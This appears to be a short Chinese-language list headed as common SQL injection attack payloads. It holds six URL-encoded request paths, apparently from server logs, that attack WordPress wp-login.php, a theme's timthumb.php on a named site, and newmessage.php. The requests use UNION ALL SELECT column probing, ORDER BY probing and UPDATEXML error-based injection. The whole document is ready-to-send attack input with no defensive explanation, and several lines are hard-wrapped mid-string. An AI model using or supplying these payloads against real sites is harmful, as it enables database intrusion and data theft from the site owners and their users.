常见SQL注入攻击载荷如下:
/wp-login.php?action=lostpassword%25%27%20ORDER%20BY%201%23 /wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-conten t%2Fuploads%2F2017%2F03%2F12.png&w=-9611%22%20UNION%20ALL%20SELECT%208303%2C%208 303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303--%20&h=210&zc=1 /newmessage.php?tosys=1&title=1%22%20AND%20UPDATEXML%283114%2CCONCAT%280x2e%2C0x 3a6e676f3a%2C%28SELECT%20%28CASE%20WHEN%20%283114%3D3114%29%20THEN%201%20ELSE%20 0%20END%29%29%2C0x3a7262793a%29%2C6430%29%20%20AND%20%22Enli%22%3D%22Enli /wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELEC T%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2 C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 /wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-conten t%2Fuploads%2F2017%2F03%2F12.png&w=-2372%22%20UNION%20ALL%20SELECT%202985%2C%202 985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202 985%2C%202985--%20&h=210&zc=1 /wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELEC T%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2 C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23